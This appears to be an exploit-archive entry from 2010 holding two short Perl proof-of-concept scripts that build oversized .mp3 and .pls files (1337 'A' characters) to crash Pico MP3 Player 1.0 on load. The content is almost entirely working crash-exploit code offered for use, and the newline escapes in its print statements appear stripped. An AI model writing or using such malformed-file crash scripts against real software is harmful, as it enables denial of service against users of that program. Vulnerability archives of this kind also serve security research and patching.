[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC
# Published : 2010-01-22
# Author : cr4wl3r
# Previous Title : yPlay 1.0.76 (.mp3) Local Crash PoC
# Next Title : QtWeb 3.0 Remote DoS/Crash Exploit
#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.mp3 >>>BOOM
#########################################################
print "#####################################################n";
print "[!] Pico MP3 Player 1.0 (.mp3) Local Crash PoCn";
print "n";
print "[!] Author: cr4wl3rn";
print "[!] Mail: cr4wl3r[!]linuxmail.orgn";
print "#####################################################n";
my $boom = "A" x 1337;
my $filename = "b00m.mp3";
open (FILE,">$filename");
print FILE "$boom";
print "nFile successfully created!n";
#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.pls >>>BOOM
#########################################################
print "#####################################################n";
print "[!] Pico MP3 Player 1.0 (.pls) Local Crash PoCn";
print "n";
print "[!] Author: cr4wl3rn";
print "[!] Mail: cr4wl3r[!]linuxmail.orgn";
print "#####################################################n";
my $boom = "A" x 1337;
my $filename = "b00m.pls";
open (FILE,">$filename");
print FILE "$boom";
print "nFile successfully created!n";